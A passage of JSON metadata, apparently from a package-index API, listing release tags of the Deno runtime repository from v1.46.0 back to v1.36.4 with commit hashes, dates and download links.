"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/d